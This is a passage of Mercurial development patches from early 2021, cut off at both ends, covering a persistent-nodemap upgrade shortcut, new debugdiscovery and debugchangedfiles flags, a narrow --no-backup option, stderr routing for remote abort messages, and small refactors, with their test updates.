+ store replacement complete; repository was inconsistent for *s (glob) + finalizing requirements file and making repository readable again + removing temporary repository $TESTTMP/test-repo/.hg/upgrade.* (glob) $ ls -1 .hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' 00changelog-*.nd (glob) 00changelog.n # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1612117920 -19800 # Mon Feb 01 00:02:00 2021 +0530 # Node ID 98e39f04d60e5dbfc6c70fd3ba5465b3e62ca662 # Parent bfaacfa8ebfc5c686080ef882b7b6b57a558d68d upgrade: implement partial upgrade for upgrading persistent-nodemap Upgrading repositories to use persistent nodemap should be fast and easy as it requires only two things: 1) Updating the requirements 2) Writing a persistent-nodemap on disk For both of the steps above, we don't need to edit existing revlogs. This patch makes upgrade only do the above mentioned two steps if we are only upgarding to use persistent-nodemap feature. Since `nodemap.persist_nodemap()` assumes that there exists a nodemap file for the given revlog if we are trying to call it, this patch adds `force` argument to create a file if does not exist which is true in our upgrade case. The test changes demonstrate that we no longer write nodemap files for manifest after upgrade which I think is desirable. 
Differential Revision: https://phab.mercurial-scm.org/D9936 diff --git a/mercurial/revlogutils/nodemap.py b/mercurial/revlogutils/nodemap.py --- a/mercurial/revlogutils/nodemap.py +++ b/mercurial/revlogutils/nodemap.py @@ -128,15 +128,20 @@ notr._postclose[k](None) -def persist_nodemap(tr, revlog, pending=False): +def persist_nodemap(tr, revlog, pending=False, force=False): """Write nodemap data on disk for a given revlog""" if getattr(revlog, 'filteredrevs', ()): raise error.ProgrammingError( "cannot persist nodemap of a filtered changelog" ) if revlog.nodemap_file is None: - msg = "calling persist nodemap on a revlog without the feature enabled" - raise error.ProgrammingError(msg) + if force: + revlog.nodemap_file = get_nodemap_file( + revlog.opener, revlog.indexfile + ) + else: + msg = "calling persist nodemap on a revlog without the feature enabled" + raise error.ProgrammingError(msg) can_incremental = util.safehasattr(revlog.index, "nodemap_data_incremental") ondisk_docket = revlog._nodemap_docket diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -24,6 +24,7 @@ util, vfs as vfsmod, ) +from ..revlogutils import nodemap def _revlogfrompath(repo, path): @@ -452,6 +453,22 @@ if upgrade_op.requirements_only: ui.status(_(b'upgrading repository requirements\n')) scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) + # if there is only one action and that is persistent nodemap upgrade + # directly write the nodemap file and update requirements instead of going + # through the whole cloning process + elif ( + len(upgrade_op.upgrade_actions) == 1 + and b'persistent-nodemap' in upgrade_op._upgrade_actions_names + and not upgrade_op.removed_actions + ): + ui.status( + _(b'upgrading repository to use persistent nodemap feature\n') + ) + with srcrepo.transaction(b'upgrade') as tr: + unfi = srcrepo.unfiltered() + cl = unfi.changelog + 
nodemap.persist_nodemap(tr, cl, force=True) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) else: with dstrepo.transaction(b'upgrade') as tr: _clonerevlogs( diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -636,28 +636,11 @@ repository locked and read-only creating temporary repository to stage upgraded data: $TESTTMP/test-repo/.hg/upgrade.* (glob) (it is safe to interrupt this process any time before data migration completes) - migrating 15018 total revisions (5006 in filelogs, 5006 in manifests, 5006 in changelog) - migrating 1.74 MB in store; 569 MB tracked data - migrating 5004 filelogs containing 5006 revisions (346 KB in store; 28.2 KB tracked data) - finished migrating 5006 filelog revisions across 5004 filelogs; change in size: 0 bytes - migrating 1 manifests containing 5006 revisions (765 KB in store; 569 MB tracked data) - finished migrating 5006 manifest revisions across 1 manifests; change in size: 0 bytes - migrating changelog containing 5006 revisions (673 KB in store; 363 KB tracked data) - finished migrating 5006 changelog revisions; change in size: 0 bytes - finished migrating 15018 total revisions; total change in store size: 0 bytes - copying phaseroots - data fully upgraded in a temporary repository - marking source repository as being upgraded; clients will be unable to read from repository - starting in-place swap of repository data - replacing store... 
- store replacement complete; repository was inconsistent for *s (glob) - finalizing requirements file and making repository readable again + upgrading repository to use persistent nodemap feature removing temporary repository $TESTTMP/test-repo/.hg/upgrade.* (glob) $ ls -1 .hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' 00changelog-*.nd (glob) 00changelog.n - 00manifest-*.nd (glob) - 00manifest.n $ hg debugnodemap --metadata uid: * (glob) # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1612290328 18000 # Tue Feb 02 13:25:28 2021 -0500 # Node ID d6e73351533b427d68a2bb0e165b60a3218210c4 # Parent 98e39f04d60e5dbfc6c70fd3ba5465b3e62ca662 # Parent 33dbc9f785e719fb583e8e3c2984634258f1fd77 branching: merge with stable diff --git a/.hgsigs b/.hgsigs --- a/.hgsigs +++ b/.hgsigs @@ -206,3 +206,4 @@ 18c17d63fdabd009e70bf994e5efb7db422f4f7f 0 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 diff --git a/.hgtags b/.hgtags --- a/.hgtags +++ b/.hgtags @@ -219,3 +219,4 @@ 18c17d63fdabd009e70bf994e5efb7db422f4f7f 5.6 1d5189a57405ceca5aa244052c9f948977f4699b 5.6.1 9da65e3cf3706ff41e08b311381c588440c27baf 5.7rc0 +0e2e7300f4302b02412b0b734717697049494c4c 5.7 # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611930187 -3600 # Fri Jan 29 15:23:07 2021 +0100 # Node ID 4f5e9a77ff7ab343d030f27ab92e334e8d9882d7 # Parent d6e73351533b427d68a2bb0e165b60a3218210c4 debugdiscovery: add flags to run discovery on subsets of the local repo Generating new repository using strip of local clone is very expensive for large repositories. And such large repository are the most likely to requires debugging around discovery. So we add a simple way to run discovery using provided sets of heads. 
Differential Revision: https://phab.mercurial-scm.org/D9945 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -69,6 +69,7 @@ pycompat, registrar, repair, + repoview, revlog, revset, revsetlang, @@ -964,20 +965,73 @@ ), (b'', b'rev', [], b'restrict discovery to this set of revs'), (b'', b'seed', b'12323', b'specify the random seed use for discovery'), + ( + b'', + b'local-as-revs', + "", + 'treat local has having these revisions only', + ), + ( + b'', + b'remote-as-revs', + "", + 'use local as remote, with only these these revisions', + ), ] + cmdutil.remoteopts, _(b'[--rev REV] [OTHER]'), ) def debugdiscovery(ui, repo, remoteurl=b"default", **opts): - """runs the changeset discovery protocol in isolation""" + """runs the changeset discovery protocol in isolation + + The local peer can be "replaced" by a subset of the local repository by + using the `--local-as-revs` flag. In the same way, the usual `remote` peer can + be "replaced" by a subset of the local repository using the + `--remote-as-revs` flag. This is useful to efficiently debug pathological + discovery situations. 
+ """ opts = pycompat.byteskwargs(opts) - remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl)) - remote = hg.peer(repo, opts, remoteurl) - ui.status(_(b'comparing with %s\n') % util.hidepassword(remoteurl)) + unfi = repo.unfiltered() + + # setup potential extra filtering + local_revs = opts[b"local_as_revs"] + remote_revs = opts[b"remote_as_revs"] # make sure tests are repeatable random.seed(int(opts[b'seed'])) + if not remote_revs: + + remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl)) + remote = hg.peer(repo, opts, remoteurl) + ui.status(_(b'comparing with %s\n') % util.hidepassword(remoteurl)) + else: + branches = (None, []) + remote_filtered_revs = scmutil.revrange( + unfi, [b"not (::(%s))" % remote_revs] + ) + remote_filtered_revs = frozenset(remote_filtered_revs) + + def remote_func(x): + return remote_filtered_revs + + repoview.filtertable[b'debug-discovery-remote-filter'] = remote_func + + remote = repo.peer() + remote._repo = remote._repo.filtered(b'debug-discovery-remote-filter') + + if local_revs: + local_filtered_revs = scmutil.revrange( + unfi, [b"not (::(%s))" % local_revs] + ) + local_filtered_revs = frozenset(local_filtered_revs) + + def local_func(x): + return local_filtered_revs + + repoview.filtertable[b'debug-discovery-local-filter'] = local_func + repo = repo.filtered(b'debug-discovery-local-filter') + data = {} if opts.get(b'old'): diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -283,7 +283,7 @@ debugdate: extended debugdeltachain: changelog, manifest, dir, template debugdirstate: nodates, dates, datesort - debugdiscovery: old, nonheads, rev, seed, ssh, remotecmd, insecure + debugdiscovery: old, nonheads, rev, seed, local-as-revs, remote-as-revs, ssh, remotecmd, insecure debugdownload: output debugextensions: template debugfileset: rev, all-files, show-matcher, show-stage diff --git a/tests/test-setdiscovery.t b/tests/test-setdiscovery.t --- 
a/tests/test-setdiscovery.t +++ b/tests/test-setdiscovery.t @@ -1588,3 +1588,139 @@ common: 0 missing: 1 common heads: 66f7d451a68b + + $ cd .. + + +Test debuging discovery using different subset of the same repository +===================================================================== + +remote is a local subset +------------------------ + +remote will be last 25 heads of the local graph + + $ cd $TESTTMP/manyheads + $ hg -R a debugdiscovery \ + > --debug \ + > --remote-as-revs 'last(heads(all()), 25)' \ + > --config devel.discovery.randomize=false + query 1; heads + searching for changes + all remote heads known locally + elapsed time: * seconds (glob) + round-trips: 1 + heads summary: + total common heads: 25 + also local heads: 25 + also remote heads: 25 + both: 25 + local heads: 260 + common: 25 + missing: 235 + remote heads: 25 + common: 25 + unknown: 0 + local changesets: 1340 + common: 400 + heads: 25 + roots: 1 + missing: 940 + heads: 235 + roots: 235 + first undecided set: 940 + heads: 235 + roots: 235 + common: 0 + missing: 940 + common heads: 0dfd965d91c6 0fe09b60448d 14a17233ce9d 175c0a3072cf 1c51e2c80832 1e51600e0698 24eb5f9bdbab 25ce09526613 36bd00abde57 426989fdefa0 596d87362679 5dd1039ea5c0 5ef24f022278 5f230dc19419 80b39998accb 88f40688ffb5 9e37ddf8c632 abf4d55b075e b2ce801fddfe b368b6ac3ce3 c959bf2e869c c9fba6ba4e2e d783207cf649 d9a51e256f21 e3717a4e3753 + +local is a local subset +------------------------ + +remote will be last 25 heads of the local graph + + $ cd $TESTTMP/manyheads + $ hg -R a debugdiscovery b \ + > --debug \ + > --local-as-revs 'first(heads(all()), 25)' \ + > --config devel.discovery.randomize=false + comparing with b + query 1; heads + searching for changes + taking quick initial sample + query 2; still undecided: 375, sample size is: 81 + sampling from both directions + query 3; still undecided: 3, sample size is: 3 + 3 total queries *s (glob) + elapsed time: * seconds (glob) + round-trips: 3 + heads summary: + total 
common heads: 1 + also local heads: 0 + also remote heads: 0 + both: 0 + local heads: 25 + common: 0 + missing: 25 + remote heads: 1 + common: 0 + unknown: 1 + local changesets: 400 + common: 300 + heads: 1 + roots: 1 + missing: 100 + heads: 25 + roots: 25 + first undecided set: 400 + heads: 25 + roots: 1 + common: 300 + missing: 100 + common heads: 3ee37d65064a + +both local and remove are subset +------------------------ + +remote will be last 25 heads of the local graph + + $ cd $TESTTMP/manyheads + $ hg -R a debugdiscovery \ + > --debug \ + > --local-as-revs 'first(heads(all()), 25)' \ + > --remote-as-revs 'last(heads(all()), 25)' \ + > --config devel.discovery.randomize=false + query 1; heads + searching for changes + taking quick initial sample + query 2; still undecided: 375, sample size is: 81 + sampling from both directions + query 3; still undecided: 3, sample size is: 3 + 3 total queries in *s (glob) + elapsed time: * seconds (glob) + round-trips: 3 + heads summary: + total common heads: 1 + also local heads: 0 + also remote heads: 0 + both: 0 + local heads: 25 + common: 0 + missing: 25 + remote heads: 25 + common: 0 + unknown: 25 + local changesets: 400 + common: 300 + heads: 1 + roots: 1 + missing: 100 + heads: 25 + roots: 25 + first undecided set: 400 + heads: 25 + roots: 1 + common: 300 + missing: 100 + common heads: 3ee37d65064a # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612389358 28800 # Wed Feb 03 13:55:58 2021 -0800 # Node ID 3c360ab2688dd4e4d4b74a8118bffa4453049757 # Parent 4f5e9a77ff7ab343d030f27ab92e334e8d9882d7 narrow: add --no-backup option for narrowing Most of our users at Google use Mercurial on a file system that keeps backups of previous versions of all files, including those in `.hg/`. They therefore don't need a separate backup in the file system when narrowing their repo (which they typically do by running `hg tracked --auto-remove-includes`). Backups can be very slow. 
`hg strip` already has a `--no-backup` option. This patch adds the same option to `hg tracked --removeinclude/--addexclude`. Differential Revision: https://phab.mercurial-scm.org/D9951 diff --git a/hgext/narrow/narrowcommands.py b/hgext/narrow/narrowcommands.py --- a/hgext/narrow/narrowcommands.py +++ b/hgext/narrow/narrowcommands.py @@ -214,6 +214,7 @@ newincludes, newexcludes, force, + backup, ): oldmatch = narrowspec.match(repo.root, oldincludes, oldexcludes) newmatch = narrowspec.match(repo.root, newincludes, newexcludes) @@ -272,7 +273,7 @@ hg.clean(repo, urev) overrides = {(b'devel', b'strip-obsmarkers'): False} with ui.configoverride(overrides, b'narrow'): - repair.strip(ui, unfi, tostrip, topic=b'narrow') + repair.strip(ui, unfi, tostrip, topic=b'narrow', backup=backup) todelete = [] for f, f2, size in repo.store.datafiles(): @@ -442,6 +443,12 @@ ), ( b'', + b'backup', + True, + _(b'back up local changes when narrowing'), + ), + ( + b'', b'update-working-copy', False, _(b'update working copy when the store has changed'), @@ -639,6 +646,7 @@ newincludes, newexcludes, opts[b'force_delete_local_changes'], + opts[b'backup'], ) # _narrow() updated the narrowspec and _widen() below needs to # use the updated values as its base (otherwise removed includes diff --git a/tests/test-narrow-trackedcmd.t b/tests/test-narrow-trackedcmd.t --- a/tests/test-narrow-trackedcmd.t +++ b/tests/test-narrow-trackedcmd.t @@ -110,6 +110,8 @@ --clear whether to replace the existing narrowspec --force-delete-local-changes forces deletion of local changes when narrowing + --[no-]backup back up local changes when narrowing + (default: on) --update-working-copy update working copy when the store has changed -e --ssh CMD specify ssh command to use diff --git a/tests/test-narrow.t b/tests/test-narrow.t --- a/tests/test-narrow.t +++ b/tests/test-narrow.t @@ -492,3 +492,20 @@ searching for changes looking for unused includes to remove found no unused includes +Test --no-backup + $ hg tracked 
--addinclude d0 --addinclude d2 -q + $ hg unbundle .hg/strip-backup/*-narrow.hg -q + $ rm .hg/strip-backup/* + $ hg tracked --auto-remove-includes --no-backup + comparing with ssh://user@dummy/master + searching for changes + looking for unused includes to remove + path:d0 + path:d2 + remove these unused includes (yn)? y + looking for local changes to affected paths + deleting data/d0/f.i + deleting data/d2/f.i + deleting meta/d0/00manifest.i (tree !) + deleting meta/d2/00manifest.i (tree !) + $ ls .hg/strip-backup/ # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612423436 28800 # Wed Feb 03 23:23:56 2021 -0800 # Node ID db9e33beb0fbc8a481a90f71dac68705091eaeac # Parent 3c360ab2688dd4e4d4b74a8118bffa4453049757 bundle2: print "error:abort" message to stderr instead of stdout It seems like the server's message is something you'd like to see even with `--quiet`. It's clearly part of the error. Differential Revision: https://phab.mercurial-scm.org/D9954 diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -1135,9 +1135,9 @@ except error.BundleValueError as exc: raise error.Abort(_(b'missing support for %s') % exc) except bundle2.AbortFromPart as exc: - pushop.ui.status(_(b'remote: %s\n') % exc) + pushop.ui.error(_(b'remote: %s\n') % exc) if exc.hint is not None: - pushop.ui.status(_(b'remote: %s\n') % (b'(%s)' % exc.hint)) + pushop.ui.error(_(b'remote: %s\n') % (b'(%s)' % exc.hint)) raise error.Abort(_(b'push failed on remote')) except error.PushkeyFailed as exc: partid = int(exc.partid) @@ -1832,7 +1832,7 @@ op.modes[b'bookmarks'] = b'records' bundle2.processbundle(pullop.repo, bundle, op=op) except bundle2.AbortFromPart as exc: - pullop.repo.ui.status(_(b'remote: abort: %s\n') % exc) + pullop.repo.ui.error(_(b'remote: abort: %s\n') % exc) raise error.Abort(_(b'pull failed on remote'), hint=exc.hint) except error.BundleValueError as exc: raise error.Abort(_(b'missing 
support for %s') % exc) diff --git a/tests/test-narrow-pull.t b/tests/test-narrow-pull.t --- a/tests/test-narrow-pull.t +++ b/tests/test-narrow-pull.t @@ -147,6 +147,7 @@ $ hg clone -q --narrow ssh://user@dummy/master narrow2 --include "f1" -r 0 $ cd narrow2 $ hg pull -q -r 1 + remote: abort: unexpected error: unable to resolve parent while packing b'00manifest.i' 1 for changeset 0 transaction abort! rollback completed abort: pull failed on remote diff --git a/tests/test-remotefilelog-clone-tree.t b/tests/test-remotefilelog-clone-tree.t --- a/tests/test-remotefilelog-clone-tree.t +++ b/tests/test-remotefilelog-clone-tree.t @@ -91,7 +91,6 @@ # flakiness here $ hg clone --noupdate ssh://user@dummy/shallow full 2>/dev/null streaming all changes - remote: abort: Cannot clone from a shallow repo to a full repo. [255] # getbundle full clone diff --git a/tests/test-remotefilelog-clone.t b/tests/test-remotefilelog-clone.t --- a/tests/test-remotefilelog-clone.t +++ b/tests/test-remotefilelog-clone.t @@ -85,9 +85,9 @@ $ TEMP_STDERR=full-clone-from-shallow.stderr.tmp $ hg clone --noupdate ssh://user@dummy/shallow full 2>$TEMP_STDERR streaming all changes - remote: abort: Cannot clone from a shallow repo to a full repo. [255] $ cat $TEMP_STDERR + remote: abort: Cannot clone from a shallow repo to a full repo. abort: pull failed on remote $ rm $TEMP_STDERR # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1612245745 -3600 # Tue Feb 02 07:02:25 2021 +0100 # Node ID c2435280ca63e135d753c82e184b4507317b4883 # Parent db9e33beb0fbc8a481a90f71dac68705091eaeac copy-tracing: add a --compute flag to debugchangedfiles This will help analysis of possible misbehaving cases. 
Differential Revision: https://phab.mercurial-scm.org/D9946 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -484,14 +484,31 @@ ui.write(b' %s\n' % v) -@command(b'debugchangedfiles', [], b'REV') -def debugchangedfiles(ui, repo, rev): +@command( + b'debugchangedfiles', + [ + ( + b'', + b'compute', + False, + b"compute information instead of reading it from storage", + ), + ], + b'REV', +) +def debugchangedfiles(ui, repo, rev, **opts): """list the stored files changes for a revision""" ctx = scmutil.revsingle(repo, rev, None) - sd = repo.changelog.sidedata(ctx.rev()) - files_block = sd.get(sidedata.SD_FILES) - if files_block is not None: - files = metadata.decode_files_sidedata(sd) + files = None + + if opts['compute']: + files = metadata.compute_all_files_changes(ctx) + else: + sd = repo.changelog.sidedata(ctx.rev()) + files_block = sd.get(sidedata.SD_FILES) + if files_block is not None: + files = metadata.decode_files_sidedata(sd) + if files is not None: for f in sorted(files.touched): if f in files.added: action = b"added" diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -272,7 +272,7 @@ debugbuilddag: mergeable-file, overwritten-file, new-file debugbundle: all, part-type, spec debugcapabilities: - debugchangedfiles: + debugchangedfiles: compute debugcheckstate: debugcolor: style debugcommands: diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -721,6 +721,11 @@ #if no-compatibility no-filelog no-changeset + $ hg debugchangedfiles --compute 0 + added : a, ; + added : b, ; + added : h, ; + $ for rev in `hg log --rev 'all()' -T '{rev}\n'`; do > echo "##### revision $rev #####" > hg debugsidedata -c -v -- $rev # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 
1612892259 28800 # Tue Feb 09 09:37:39 2021 -0800 # Node ID 05dd091dfa6a76314dd7b1fae61378984c982127 # Parent c2435280ca63e135d753c82e184b4507317b4883 wireprotopeer: clarify some variable names now that we allow snake_case "encargsorres" is hard to parse ("encarg sorres" sounds like it might be Spanish to me, and indeed Google Translate tells me that it's Catalan for "order sands"). Let's clarify with some added underscores and longer names. Differential Revision: https://phab.mercurial-scm.org/D9973 diff --git a/mercurial/httppeer.py b/mercurial/httppeer.py --- a/mercurial/httppeer.py +++ b/mercurial/httppeer.py @@ -171,9 +171,9 @@ # Send arguments via HTTP headers. if headersize > 0: # The headers can typically carry more data than the URL. - encargs = urlreq.urlencode(sorted(args.items())) + encoded_args = urlreq.urlencode(sorted(args.items())) for header, value in encodevalueinheaders( - encargs, b'X-HgArg', headersize + encoded_args, b'X-HgArg', headersize ): headers[header] = value # Send arguments via query string (Mercurial <1.9). diff --git a/mercurial/wireprotov1peer.py b/mercurial/wireprotov1peer.py --- a/mercurial/wireprotov1peer.py +++ b/mercurial/wireprotov1peer.py @@ -43,14 +43,14 @@ @batchable def sample(self, one, two=None): # Build list of encoded arguments suitable for your wire protocol: - encargs = [('one', encode(one),), ('two', encode(two),)] + encoded_args = [('one', encode(one),), ('two', encode(two),)] # Create future for injection of encoded result: - encresref = future() + encoded_res_future = future() # Return encoded arguments and future: - yield encargs, encresref + yield encoded_args, encoded_res_future # Assuming the future to be filled with the result from the batched # request now. 
Decode it: - yield decode(encresref.value) + yield decode(encoded_res_future.value) The decorator returns a function which wraps this coroutine as a plain method, but adds the original method as an attribute called "batchable", @@ -60,12 +60,12 @@ def plain(*args, **opts): batchable = f(*args, **opts) - encargsorres, encresref = next(batchable) - if not encresref: - return encargsorres # a local result in this case + encoded_args_or_res, encoded_res_future = next(batchable) + if not encoded_res_future: + return encoded_args_or_res # a local result in this case self = args[0] cmd = pycompat.bytesurl(f.__name__) # ensure cmd is ascii bytestr - encresref.set(self._submitone(cmd, encargsorres)) + encoded_res_future.set(self._submitone(cmd, encoded_args_or_res)) return next(batchable) setattr(plain, 'batchable', f) @@ -257,15 +257,15 @@ # Encoded arguments and future holding remote result. try: - encargsorres, fremote = next(batchable) + encoded_args_or_res, fremote = next(batchable) except Exception: pycompat.future_set_exception_info(f, sys.exc_info()[1:]) return if not fremote: - f.set_result(encargsorres) + f.set_result(encoded_args_or_res) else: - requests.append((command, encargsorres)) + requests.append((command, encoded_args_or_res)) states.append((command, f, batchable, fremote)) if not requests: diff --git a/tests/test-batching.py b/tests/test-batching.py --- a/tests/test-batching.py +++ b/tests/test-batching.py @@ -204,7 +204,7 @@ @wireprotov1peer.batchable def foo(self, one, two=None): - encargs = [ + encoded_args = [ ( b'one', mangle(one), @@ -214,9 +214,9 @@ mangle(two), ), ] - encresref = wireprotov1peer.future() - yield encargs, encresref - yield unmangle(encresref.value) + encoded_res_future = wireprotov1peer.future() + yield encoded_args, encoded_res_future + yield unmangle(encoded_res_future.value) @wireprotov1peer.batchable def bar(self, b, a): # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612178753 -3600 # Mon Feb 01 
12:25:53 2021 +0100 # Node ID 0d734c0ae1cfa50de9e9b79aaaaf3089d8d37f78 # Parent 05dd091dfa6a76314dd7b1fae61378984c982127 rust: replace read_whole_file with std::fs::read It does the same thing Differential Revision: https://phab.mercurial-scm.org/D9959 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -14,7 +14,6 @@ use std::path::PathBuf; use crate::repo::Repo; -use crate::utils::files::read_whole_file; /// Holds the config values for the current repository /// TODO update this docstring once we support more sources @@ -64,7 +63,7 @@ ConfigSource::AbsPath(c) => { // TODO check if it should be trusted // mercurial/ui.py:427 - let data = match read_whole_file(&c) { + let data = match std::fs::read(&c) { Err(_) => continue, // same as the python code Ok(data) => data, }; diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -8,9 +8,7 @@ // GNU General Public License version 2 or any later version. 
